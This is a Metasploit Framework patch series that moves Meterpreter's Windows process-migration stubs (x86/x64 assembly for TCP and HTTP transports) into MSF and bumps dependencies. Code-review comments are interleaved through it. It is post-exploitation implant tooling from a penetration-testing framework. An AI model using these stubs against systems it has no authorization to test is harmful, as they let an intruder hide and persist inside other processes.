From d0696a09ada18f2f28a9dbc49cc8148368e0e314 Mon Sep 17 00:00:00 2001
From: OJ
Date: Thu, 8 Dec 2016 16:01:13 +1000
Subject: [PATCH 1/2] Move migration stub generation into MSF

This code adds support for transport-specific migration stubs to be generated in MSF rather than having them hard-coded in Meterpreter.
---
 lib/msf/core/payload/transport_config.rb | 44 +++++-----
 lib/msf/core/payload/windows/migrate.rb | 5 ++
 .../core/payload/windows/migrate_common.rb | 49 +++++++++++
 lib/msf/core/payload/windows/migrate_http.rb | 40 +++++++++
 lib/msf/core/payload/windows/migrate_tcp.rb | 68 +++++++++++++++
 lib/msf/core/payload/windows/x64/migrate.rb | 5 ++
 .../payload/windows/x64/migrate_common.rb | 50 +++++++++++
 .../core/payload/windows/x64/migrate_http.rb | 41 +++++++++
 .../core/payload/windows/x64/migrate_tcp.rb | 71 ++++++++++++++++
 lib/rex/post/meterpreter/client_core.rb | 83 ++++++++++++++-----
 lib/rex/post/meterpreter/packet.rb | 4 +-
 11 files changed, 418 insertions(+), 42 deletions(-)
 create mode 100644 lib/msf/core/payload/windows/migrate.rb
 create mode 100644 lib/msf/core/payload/windows/migrate_common.rb
 create mode 100644 lib/msf/core/payload/windows/migrate_http.rb
 create mode 100644 lib/msf/core/payload/windows/migrate_tcp.rb
 create mode 100644 lib/msf/core/payload/windows/x64/migrate.rb
 create mode 100644 lib/msf/core/payload/windows/x64/migrate_common.rb
 create mode 100644 lib/msf/core/payload/windows/x64/migrate_http.rb
 create mode 100644 lib/msf/core/payload/windows/x64/migrate_tcp.rb

diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb
index 6e696e07f9..b239aec7a2 100644
--- a/lib/msf/core/payload/transport_config.rb
+++ b/lib/msf/core/payload/transport_config.rb
@@ -25,13 +25,10 @@ module Msf::Payload::TransportConfig
 
   def transport_config_bind_tcp(opts={})
     {
-      :scheme => 'tcp',
-      :lhost => datastore['LHOST'],
-      :lport => datastore['LPORT'].to_i,
-      :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
-      :retry_total => datastore['SessionRetryTotal'].to_i,
-      :retry_wait => datastore['SessionRetryWait'].to_i
-    }
+      scheme: 'tcp',
+      lhost: datastore['LHOST'],
+      lport: datastore['LPORT'].to_i
+    }.merge(timeout_config)
   end
 
   def transport_config_reverse_https(opts={})
@@ -54,19 +51,26 @@ module Msf::Payload::TransportConfig
     end
 
     {
-      :scheme => 'http',
-      :lhost => opts[:lhost] || datastore['LHOST'],
-      :lport => (opts[:lport] || datastore['LPORT']).to_i,
-      :uri => uri,
-      :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
-      :retry_total => datastore['SessionRetryTotal'].to_i,
-      :retry_wait => datastore['SessionRetryWait'].to_i,
-      :ua => datastore['MeterpreterUserAgent'],
-      :proxy_host => datastore['PayloadProxyHost'],
-      :proxy_port => datastore['PayloadProxyPort'],
-      :proxy_type => datastore['PayloadProxyType'],
-      :proxy_user => datastore['PayloadProxyUser'],
-      :proxy_pass => datastore['PayloadProxyPass']
+      scheme: 'http',
+      lhost: opts[:lhost] || datastore['LHOST'],
+      lport: (opts[:lport] || datastore['LPORT']).to_i,
+      uri: uri,
+      ua: datastore['MeterpreterUserAgent'],
+      proxy_host: datastore['PayloadProxyHost'],
+      proxy_port: datastore['PayloadProxyPort'],
+      proxy_type: datastore['PayloadProxyType'],
+      proxy_user: datastore['PayloadProxyUser'],
+      proxy_pass: datastore['PayloadProxyPass']
+    }.merge(timeout_config)
+  end
+
+private
+
+  def timeout_config
+    {
+      comm_timeout: datastore['SessionCommunicationTimeout'].to_i,
+      retry_total: datastore['SessionRetryTotal'].to_i,
+      retry_wait: datastore['SessionRetryWait'].to_i
     }
   end
 
diff --git a/lib/msf/core/payload/windows/migrate.rb b/lib/msf/core/payload/windows/migrate.rb
new file mode 100644
index 0000000000..f9b924780e
--- /dev/null
+++ b/lib/msf/core/payload/windows/migrate.rb
@@ -0,0 +1,5 @@
+# -*- coding: binary -*-
+
+require 'msf/core/payload/windows/block_api'
+require 'msf/core/payload/windows/migrate_tcp'
+require 'msf/core/payload/windows/migrate_http'
diff --git a/lib/msf/core/payload/windows/migrate_common.rb b/lib/msf/core/payload/windows/migrate_common.rb
new file mode 100644
index 0000000000..1cb3a5e148
--- /dev/null
+++ b/lib/msf/core/payload/windows/migrate_common.rb
@@ -0,0 +1,49 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/block_api'
+
+module Msf
+
+###
+#
+# Not really a payload, but more a mixin that lets common functionality
+# live in spot that makes sense, so that code duplication is reduced.
+#
+###
+
+module Payload::Windows::MigrateCommon
+
+  include Msf::Payload::Windows
+  include Msf::Payload::Windows::BlockApi
+
+  #
+  # Constructs the migrate stub on the fly
+  #
+  def generate(opts={})
+    asm = %Q^
+    migrate:
+      cld
+      pop esi
+      pop esi               ; esi now contains the pointer to the migrate context
+      sub esp, 0x2000
+      call start
+      #{asm_block_api}
+    start:
+      pop ebp
+      #{generate_migrate(opts)}
+    signal_event:
+      push dword [esi]      ; Event handle is pointed at by esi
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
+      call ebp              ; SetEvent(handle)
+    call_payload:
+      call dword [esi+8]    ; Invoke the associated payload
+    ^
+
+    Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
+  end
+
+end
+
+end
+
diff --git a/lib/msf/core/payload/windows/migrate_http.rb b/lib/msf/core/payload/windows/migrate_http.rb
new file mode 100644
index 0000000000..124c0ddd7d
--- /dev/null
+++ b/lib/msf/core/payload/windows/migrate_http.rb
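Review bot: The migrate-context layout that `generate` in migrate_common.rb depends on — the event handle read at `[esi]`, the payload entry called at `[esi+8]`, and the WSAPROTOCOL_INFO that migrate_tcp.rb reads at `[esi+0x10]` — is a contract with the Meterpreter side that passes the context in, yet it is only described piecemeal in assembly comments. A header comment on `generate` such as `# Migrate context layout (must match what Meterpreter passes in): +0 event handle, +8 payload entry point, +0x10 WSAPROTOCOL_INFO (TCP transport only)` would state it once, and naming the offsets as constants would keep the four stubs (this file, migrate_tcp.rb, x64/migrate_common.rb, x64/migrate_tcp.rb) from drifting apart. The mixin also interpolates `generate_migrate(opts)` into the heredoc without documenting that every including module must define it and return assembly text; saying so in the module comment, e.g. `# Including modules must implement generate_migrate(opts) and return the transport-specific assembly that runs before signal_event`, would help, since the only enforcement today is a NoMethodError raised from inside `generate`.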
@@ -0,0 +1,40 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/migrate_common'
+
+module Msf
+
+###
+#
+# Payload that supports migration over HTTP/S transports on x86.
+#
+###
+
+module Payload::Windows::MigrateHttp
+
+  include Msf::Payload::Windows::MigrateCommon
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'HTTP/S Transport Migration (x86)',
+      'Description' => 'Migration stub to use over HTTP/S transports via x86',
+      'Author'      => ['OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86
+    ))
+  end
+
+  #
+  # Constructs the migrate stub on the fly
+  #
+  def generate_migrate(opts={})
+    # This payload only requires the common features, so return
+    # an empty string indicating no code requires.
+    ''
+  end
+
+end
+
+end
diff --git a/lib/msf/core/payload/windows/migrate_tcp.rb b/lib/msf/core/payload/windows/migrate_tcp.rb
new file mode 100644
index 0000000000..f9b82513b1
--- /dev/null
+++ b/lib/msf/core/payload/windows/migrate_tcp.rb
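Review bot: The comment in `generate_migrate` of migrate_http.rb, `# an empty string indicating no code requires.`, is ungrammatical and does not say why HTTP/S needs nothing transport-specific. `# HTTP/S transports need no extra setup: the common stub signals the event and calls the payload directly, so return an empty string.` states the reason that is visible in migrate_common.rb. The identical comment appears in x64/migrate_http.rb and should be fixed there too.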
@@ -0,0 +1,68 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/migrate_common'
+
+module Msf
+
+###
+#
+# Payload that supports migration over the TCP transport on x86.
+#
+###
+
+module Payload::Windows::MigrateTcp
+
+  include Msf::Payload::Windows::MigrateCommon
+
+  WSA_VERSION = 0x190
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'TCP Transport Migration (x86)',
+      'Description' => 'Migration stub to use over the TCP transport via x86',
+      'Author'      => ['OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86
+    ))
+  end
+
+  #
+  # Constructs the migrate stub on the fly
+  #
+  def generate_migrate(opts={})
+    %Q^
+    load_ws2_32:
+      push '32'
+      push 'ws2_'
+      push esp               ; pointer to 'ws2_32'
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+      call ebp               ; LoadLibraryA('ws2_32')
+    init_networking:
+      mov eax, #{WSA_VERSION} ; EAX == version, and is also used for size
+      sub esp, eax           ; allocate space for the WSAData structure
+      push esp               ; Pointer to the WSAData structure
+      push eax               ; Version required
+      push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+      call ebp               ; WSAStartup(Version, &WSAData)
+    create_socket:
+      push eax               ; eax is 0 on success, use it for flags
+      push eax               ; reserved
+      lea ebx, [esi+0x10]    ; get offset to the WSAPROTOCOL_INFO struct
+      push ebx               ; pass the info struct address
+      push eax               ; no protocol is specified
+      inc eax
+      push eax               ; SOCK_STREAM
+      inc eax
+      push eax               ; AF_INET
+      push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+      call ebp               ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0)
+      xchg edi, eax
+    ^
+  end
+
+end
+
+end
+
diff --git a/lib/msf/core/payload/windows/x64/migrate.rb b/lib/msf/core/payload/windows/x64/migrate.rb
new file mode 100644
index 0000000000..20fad5bb2d
--- /dev/null
+++ b/lib/msf/core/payload/windows/x64/migrate.rb
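Review bot: The TCP stub in `generate_migrate` of migrate_tcp.rb assumes every API call succeeds: `push eax ; eax is 0 on success, use it for flags` reuses WSAStartup's return value as the flags, reserved and protocol arguments of WSASocketA, and `xchg edi, eax` stores WSASocketA's result without checking it against INVALID_SOCKET, so on failure the common stub still signals the event and calls the payload with a bad socket in edi. Shellcode size may rule out a real error path, but the assumption should at least be written down, e.g. `; NOTE: no error checking — a failed WSAStartup/WSASocketA still falls through to the payload with an invalid socket` above `create_socket:`, so a future maintainer does not mistake the eax reuse for a checked value. The x64 stub in x64/migrate_tcp.rb has the same property.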
@@ -0,0 +1,5 @@
+# -*- coding: binary -*-
+
+require 'msf/core/payload/windows/x64/block_api'
+require 'msf/core/payload/windows/x64/migrate_tcp'
+require 'msf/core/payload/windows/x64/migrate_http'
diff --git a/lib/msf/core/payload/windows/x64/migrate_common.rb b/lib/msf/core/payload/windows/x64/migrate_common.rb
new file mode 100644
index 0000000000..81230616e7
--- /dev/null
+++ b/lib/msf/core/payload/windows/x64/migrate_common.rb
@@ -0,0 +1,50 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/x64/block_api'
+
+module Msf
+
+###
+#
+# Not really a payload, but more a mixin that lets common functionality
+# live in spot that makes sense, so that code duplication is reduced.
+#
+###
+
+module Payload::Windows::MigrateCommon_x64
+
+  include Msf::Payload::Windows
+  include Msf::Payload::Windows::BlockApi_x64
+
+  #
+  # Constructs the migrate stub on the fly
+  #
+  def generate(opts={})
+    asm = %Q^
+    migrate:
+      cld
+      mov rsi, rcx
+      sub rsp, 0x2000
+      and rsp, ~0xF
+      call start
+      #{asm_block_api}
+    start:
+      pop rbp
+      #{generate_migrate(opts)}
+    signal_event:
+      mov rcx, qword [rsi]  ; Event handle is pointed at by rsi
+      mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
+      call rbp              ; SetEvent(handle)
+    call_payload:
+      call qword [rsi+8]    ; Invoke the associated payload
+    ^
+
+    Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
+  end
+
+end
+
+end
+
+
diff --git a/lib/msf/core/payload/windows/x64/migrate_http.rb b/lib/msf/core/payload/windows/x64/migrate_http.rb
new file mode 100644
index 0000000000..631d3f3b9f
--- /dev/null
+++ b/lib/msf/core/payload/windows/x64/migrate_http.rb
@@ -0,0 +1,41 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/x64/block_api'
+
+module Msf
+
+###
+#
+# Payload that supports migration over HTTP/S transports on x64.
+#
+###
+
+module Payload::Windows::MigrateHttp_x64
+
+  include Msf::Payload::Windows::MigrateCommon_x64
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'HTTP/S Transport Migration (x64)',
+      'Description' => 'Migration stub to use over HTTP/S transports via x64',
+      'Author'      => ['OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X64
+    ))
+  end
+
+  #
+  # Constructs the migrate stub on the fly
+  #
+  def generate_migrate(opts={})
+    # This payload only requires the common features, so return
+    # an empty string indicating no code requires.
+    ''
+  end
+
+end
+
+end
+
diff --git a/lib/msf/core/payload/windows/x64/migrate_tcp.rb b/lib/msf/core/payload/windows/x64/migrate_tcp.rb
new file mode 100644
index 0000000000..fc70b083fb
--- /dev/null
+++ b/lib/msf/core/payload/windows/x64/migrate_tcp.rb
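Review bot: x64/migrate_http.rb requires `'msf/core/payload/windows/x64/block_api'` but includes `Msf::Payload::Windows::MigrateCommon_x64`, which this commit defines in x64/migrate_common.rb; the file only resolves the constant because x64/migrate.rb happens to require x64/migrate_tcp.rb (which requires migrate_common) first. The x86 counterpart migrate_http.rb requires `'msf/core/payload/windows/migrate_common'` directly, so for the same load-order independence this line should be `require 'msf/core/payload/windows/x64/migrate_common'`.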
@@ -0,0 +1,71 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/x64/migrate_common'
+
+module Msf
+
+###
+#
+# Payload that supports migration over the TCP transport on x64.
+#
+###
+
+module Payload::Windows::MigrateTcp_x64
+
+  include Msf::Payload::Windows::MigrateCommon_x64
+
+  # Minimum size, plus bytes for alignment
+  WSA_SIZE = 0x1A0
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'TCP Transport Migration (x64)',
+      'Description' => 'Migration stub to use over the TCP transport via x64',
+      'Author'      => ['OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X64
+    ))
+  end
+
+  #
+  # Constructs the migrate stub on the fly
+  #
+  def generate_migrate(opts={})
+    %Q^
+    load_ws2_32:
+      mov r14, 'ws2_32'
+      push r14
+      mov rcx, rsp           ; pointer to 'ws2_32'
+      sub rsp, #{WSA_SIZE}   ; alloc size, plus alignment (used later)
+      mov r13, rsp           ; save pointer to this struct
+      sub rsp, 0x28          ; space for api function calls (really?)
+      mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+      call rbp               ; LoadLibraryA('ws2_32')
+    init_networking:
+      mov rdx, r13           ; pointer to the wsadata struct
+      push 2
+      pop rcx                ; Version = 2
+      mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+      call rbp               ; WSAStartup(Version, &WSAData)
+    create_socket:
+      xor r8, r8             ; protocol not specified
+      push r8                ; flags == 0
+      push r8                ; reserved == NULL
+      lea r9, [rsi+0x10]     ; Pointer to the info in the migration context
+      push 1
+      pop rdx                ; SOCK_STREAM
+      push 2
+      pop rcx                ; AF_INET
+      mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+      call rbp               ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0)
+      xchg rdi, rax
+    ^
+  end
+
+end
+
+end
+
+
diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index d86c1281d3..cc00ff8866 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
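Review bot: `sub rsp, 0x28 ; space for api function calls (really?)` in `generate_migrate` of x64/migrate_tcp.rb ships an unresolved question about the calling convention in the shipped stub. Whether the 0x28 is needed depends on whether `asm_block_api` (from x64/block_api.rb, outside this diff) reserves the 0x20-byte shadow space before dispatching; if it does, the instruction is redundant for that purpose and the `WSA_SIZE` "plus bytes for alignment" note becomes the only reason to keep it, and if it does not, the HTTP variant — which calls `SetEvent` from x64/migrate_common.rb with no such reservation — would be the one that is wrong. Resolve it against block_api and replace the comment with the actual reason, for example `; keep rsp 16-byte aligned for the calls below (shadow space is reserved by the block API)` if that is what holds, or drop the instruction.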
@@ -7,6 +7,8 @@ require 'rex/post/meterpreter/client'
 # Used to generate a reflective DLL when migrating. This is yet another
 # argument for moving the meterpreter client into the Msf namespace.
 require 'msf/core/payload/windows'
+require 'msf/core/payload/windows/migrate'
+require 'msf/core/payload/windows/x64/migrate'
 
 # URI uuid and checksum stuff
 require 'msf/core/payload/uuid'
@@ -479,7 +481,8 @@ class ClientCore < Extension
           # Rex::Post::FileStat#writable? isn't available
         end
 
-        blob = generate_payload_stub(target_process)
+        migrate_stub = generate_migrate_stub(target_process)
+        migrate_payload = generate_migrate_payload(target_process)
 
         # Build the migration request
         request = Packet.create_request('core_migrate')
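Review bot: `migrate_stub = generate_migrate_stub(target_process)` now runs for every session before the platform-specific branch, but `generate_migrate_stub` (added later in this commit, in the hunk at `@@ -604,7 +609,47 @@`) raises `RuntimeError, "Unsupported session ..."` whenever `client.platform` is not `'windows'`, so migration on Linux sessions — whose handling follows in the next hunk, starting at `pos = migrate_payload.index(DEFAULT_SOCK_PATH)` — can no longer be reached. Unless the Linux Meterpreter is expected to accept or ignore the new stub TLVs, the stub should only be generated and attached for Windows sessions, e.g. `migrate_stub = client.platform == 'windows' ? generate_migrate_stub(target_process) : nil` here, with the two `TLV_TYPE_MIGRATE_STUB*` `add_tlv` calls in the next hunk wrapped in `if migrate_stub`. The enclosing method starts before this hunk.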
@@ -491,23 +494,25 @@ class ClientCore < Extension
             raise RuntimeError, 'The writable dir is too long', caller
           end
 
-          pos = blob.index(DEFAULT_SOCK_PATH)
+          pos = migrate_payload.index(DEFAULT_SOCK_PATH)
           if pos.nil?
             raise RuntimeError, 'The meterpreter binary is wrong', caller
           end
 
-          blob[pos, socket_path.length + 1] = socket_path + "\x00"
+          migrate_payload[pos, socket_path.length + 1] = socket_path + "\x00"
 
-          ep = elf_ep(blob)
+          ep = elf_ep(migrate_payload)
 
           request.add_tlv(TLV_TYPE_MIGRATE_BASE_ADDR, 0x20040000)
           request.add_tlv(TLV_TYPE_MIGRATE_ENTRY_POINT, ep)
           request.add_tlv(TLV_TYPE_MIGRATE_SOCKET_PATH, socket_path, false, client.capabilities[:zlib])
         end
 
         request.add_tlv( TLV_TYPE_MIGRATE_PID, target_pid )
-        request.add_tlv( TLV_TYPE_MIGRATE_LEN, blob.length )
-        request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, blob, false, client.capabilities[:zlib])
+        request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD_LEN, migrate_payload.length )
+        request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, migrate_payload, false, client.capabilities[:zlib])
+        request.add_tlv( TLV_TYPE_MIGRATE_STUB_LEN, migrate_stub.length )
+        request.add_tlv( TLV_TYPE_MIGRATE_STUB, migrate_stub, false, client.capabilities[:zlib])
 
         if target_process['arch'] == ARCH_X64
           request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 2 ) # PROCESS_ARCH_X64
@@ -604,7 +609,47 @@ class ClientCore < Extension
     end
   end
 
-  private
+private
+
+  def get_current_transport
+    transport_list[:transports][0]
+  end
+
+  def generate_migrate_stub(target_process)
+    stub = nil
+
+    if client.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(client.arch)
+      t = get_current_transport
+
+      c = Class.new(::Msf::Payload)
+
+      if target_process['arch'] == ARCH_X86
+        c.include(::Msf::Payload::Windows::BlockApi)
+        case t[:url]
+        when /^tcp/i
+          c.include(::Msf::Payload::Windows::MigrateTcp)
+        when /^http/i
+          # Covers HTTP and HTTPS
+          c.include(::Msf::Payload::Windows::MigrateHttp)
+        end
+      else
+        c.include(::Msf::Payload::Windows::BlockApi_x64)
+        case t[:url]
+        when /^tcp/i
+          c.include(::Msf::Payload::Windows::MigrateTcp_x64)
+        when /^http/i
+          # Covers HTTP and HTTPS
+          c.include(::Msf::Payload::Windows::MigrateHttp_x64)
+        end
+      end
+
+      stub = c.new().generate
+    else
+      raise RuntimeError, "Unsupported session #{client.session_type}"
+    end
+
+    stub
+  end
 
   def transport_prepare_request(method, opts={})
     unless valid_transport?(opts[:transport]) && opts[:lport]
@@ -694,12 +739,12 @@ class ClientCore < Extension
   end
 
 
-  def generate_payload_stub(process)
+  def generate_migrate_payload(target_process)
     case client.platform
     when 'windows'
-      blob = generate_windows_stub(process)
+      blob = generate_migrate_windows_payload(target_process)
     when 'linux'
-      blob = generate_linux_stub
+      blob = generate_migrate_linux_payload
     else
       raise RuntimeError, "Unsupported platform '#{client.platform}'"
     end
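Review bot: In `generate_migrate_stub`, neither `case t[:url]` has an `else`, so a transport whose URL matches neither `/^tcp/i` nor `/^http/i` leaves `c` without a `generate_migrate` method and `c.new().generate` then fails with a NoMethodError raised from inside the assembly heredoc instead of a clear message; likewise the outer `else` treats every non-x86 target as x64, whereas `generate_migrate_windows_payload` in the hunk at `@@ -707,31 +752,27 @@` raises on an unknown target architecture. Checking the platform up front, selecting the mixin pair by target arch with an explicit `else raise`, and then selecting the transport mixin with its own `else raise` removes both silent paths and the `stub = nil` placeholder; a sketch of that shape follows, where the `raise` messages are illustrative. `c.new` without the empty parentheses also matches the style guide.
```ruby
  def generate_migrate_stub(target_process)
    unless client.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(client.arch)
      raise RuntimeError, "Unsupported session #{client.session_type}"
    end

    t = get_current_transport
    c = Class.new(::Msf::Payload)

    case target_process['arch']
    when ARCH_X86
      c.include(::Msf::Payload::Windows::BlockApi)
      tcp_mixin = ::Msf::Payload::Windows::MigrateTcp
      http_mixin = ::Msf::Payload::Windows::MigrateHttp
    when ARCH_X64
      c.include(::Msf::Payload::Windows::BlockApi_x64)
      tcp_mixin = ::Msf::Payload::Windows::MigrateTcp_x64
      http_mixin = ::Msf::Payload::Windows::MigrateHttp_x64
    else
      raise RuntimeError, "Unsupported target architecture '#{target_process['arch']}' for migration", caller
    end

    case t[:url]
    when /^tcp/i
      c.include(tcp_mixin)
    when /^http/i
      # Covers HTTP and HTTPS
      c.include(http_mixin)
    else
      raise RuntimeError, "Unsupported transport '#{t[:url]}' for migration", caller
    end

    c.new.generate
  end
```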
@@ -707,31 +752,27 @@ class ClientCore < Extension
     blob
   end
 
-  def generate_windows_stub(process)
+  def generate_migrate_windows_payload(target_process)
     c = Class.new( ::Msf::Payload )
     c.include( ::Msf::Payload::Stager )
 
     # Include the appropriate reflective dll injection module for the target process architecture...
-    if process['arch'] == ARCH_X86
+    if target_process['arch'] == ARCH_X86
       c.include( ::Msf::Payload::Windows::MeterpreterLoader )
-    elsif process['arch'] == ARCH_X64
+    elsif target_process['arch'] == ARCH_X64
       c.include( ::Msf::Payload::Windows::MeterpreterLoader_x64 )
     else
-      raise RuntimeError, "Unsupported target architecture '#{process['arch']}' for process '#{process['name']}'.", caller
+      raise RuntimeError, "Unsupported target architecture '#{target_process['arch']}' for process '#{target_process['name']}'.", caller
     end
 
     # Create the migrate stager
     migrate_stager = c.new()
 
-    blob = migrate_stager.stage_meterpreter
-
-    blob
+    migrate_stager.stage_meterpreter
   end
 
-  def generate_linux_stub
-    blob = MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin')
-
-    blob
+  def generate_migrate_linux_payload
+    MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin')
   end
 
   def elf_ep(payload)
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index 372324381f..97b485add8 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -80,12 +80,14 @@ TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
 TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
 TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
 TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402
-TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403
+TLV_TYPE_MIGRATE_PAYLOAD_LEN = TLV_META_TYPE_UINT | 403
 TLV_TYPE_MIGRATE_PAYLOAD = TLV_META_TYPE_STRING | 404
 TLV_TYPE_MIGRATE_ARCH = TLV_META_TYPE_UINT | 405
 TLV_TYPE_MIGRATE_BASE_ADDR = TLV_META_TYPE_UINT | 407
 TLV_TYPE_MIGRATE_ENTRY_POINT = TLV_META_TYPE_UINT | 408
 TLV_TYPE_MIGRATE_SOCKET_PATH = TLV_META_TYPE_STRING | 409
+TLV_TYPE_MIGRATE_STUB_LEN = TLV_META_TYPE_UINT | 410
+TLV_TYPE_MIGRATE_STUB = TLV_META_TYPE_STRING | 411
 
 TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430
 

From ea704211ca5d3f17447bcb4808fc54a02b8ea55f Mon Sep 17 00:00:00 2001
From: William Webb
Date: Thu, 22 Dec 2016 17:50:43 -0600
Subject: [PATCH 2/2] incorporate payload stub generation changes

---
 Gemfile.lock | 14 +++++++-------
 metasploit-framework.gemspec | 2 +-
 .../singles/windows/meterpreter_bind_tcp.rb | 2 +-
 .../singles/windows/meterpreter_reverse_http.rb | 2 +-
 .../singles/windows/meterpreter_reverse_https.rb | 2 +-
 .../windows/meterpreter_reverse_ipv6_tcp.rb | 2 +-
 .../singles/windows/meterpreter_reverse_tcp.rb | 2 +-
 .../singles/windows/x64/meterpreter_bind_tcp.rb | 2 +-
 .../windows/x64/meterpreter_reverse_http.rb | 2 +-
 .../windows/x64/meterpreter_reverse_https.rb | 2 +-
 .../windows/x64/meterpreter_reverse_ipv6_tcp.rb | 2 +-
 .../singles/windows/x64/meterpreter_reverse_tcp.rb | 2 +-
 12 files changed, 18 insertions(+), 18 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index bdbbe32534..e9a81cc215 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -14,7 +14,7 @@ PATH
     metasploit-concern
     metasploit-credential
     metasploit-model
-    metasploit-payloads (= 1.2.4)
+    metasploit-payloads (= 1.2.5)
     metasploit_data_models
     metasploit_payloads-mettle (= 0.1.3)
     msgpack
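Review bot: The two new TLV ids in packet.rb, `TLV_TYPE_MIGRATE_STUB_LEN = TLV_META_TYPE_UINT | 410` and `TLV_TYPE_MIGRATE_STUB = TLV_META_TYPE_STRING | 411`, together with the renamed `TLV_TYPE_MIGRATE_PAYLOAD_LEN` (value 403 unchanged), form a wire contract with the Meterpreter side, yet nothing in the file records which metasploit-payloads release understands them; the second patch pins that gem to 1.2.5, which suggests it is the minimum. A comment above the two new constants such as `# Transport-specific migration stub generated by MSF (see Msf::Payload::Windows::MigrateCommon); the receiving Meterpreter must understand types 410/411` would make the dependency visible to whoever next touches the migration path.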
@@ -135,10 +135,10 @@ GEM
     diff-lcs (1.2.5)
     docile (1.1.5)
     erubis (2.7.0)
-    factory_girl (4.7.0)
+    factory_girl (4.8.0)
       activesupport (>= 3.0.0)
-    factory_girl_rails (4.7.0)
-      factory_girl (~> 4.7.0)
+    factory_girl_rails (4.8.0)
+      factory_girl (~> 4.8.0)
       railties (>= 3.0.0)
     faraday (0.10.0)
       multipart-post (>= 1.2, < 3)
@@ -169,7 +169,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.2.4)
+    metasploit-payloads (1.2.5)
     metasploit_data_models (2.0.10)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -232,7 +232,7 @@ GEM
       activesupport (= 4.2.7.1)
       rake (>= 0.8.7)
       thor (>= 0.18.1, < 2.0)
-    rake (11.3.0)
+    rake (12.0.0)
     rb-readline-r7 (0.5.2.0)
     recog (2.1.2)
       nokogiri
@@ -250,7 +250,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.3)
+    rex-exploitation (0.1.4)
       jsobfu
       metasm
       rex-arch
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 5572254f79..998c0db215 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -65,7 +65,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.2.4'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.2.5'
   # Needed for the next-generation POSIX Meterpreter
   spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.3'
   # Needed by msfgui and other rpc components
diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
index 4aba839b4d..c0f9db83dc 100644
--- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 957999
+  CachedSize = 957487
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
